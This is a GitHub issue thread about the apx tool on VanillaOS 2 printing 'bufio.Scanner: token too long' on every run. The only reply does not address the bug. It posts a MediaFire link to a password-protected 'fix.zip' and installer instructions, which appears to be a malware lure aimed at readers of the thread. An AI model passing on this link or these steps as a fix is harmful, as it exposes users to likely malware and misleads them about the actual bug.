### ISSUE TITLE
apx "error reading binaries" on every run

### ISSUE THREAD

**Issue by xiorcale** [Vanilla-OS/apx#396]
When runninx apx (doesn't matter which subcommand), it works, but it also print everytime this error message:

`error reading binaries: bufio.Scanner: token too long`

This happens right after a fresh install of the OS, I haven't tweaked or changed anything yet, I was litterally just trying apx.

I am running VanillaOS 2 Orchid using the vanilla-os/nvidia package. I know it is not much information to reproduce the bug, so let me know if I can give you any other info that could help.

**Comment by Searchanik** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
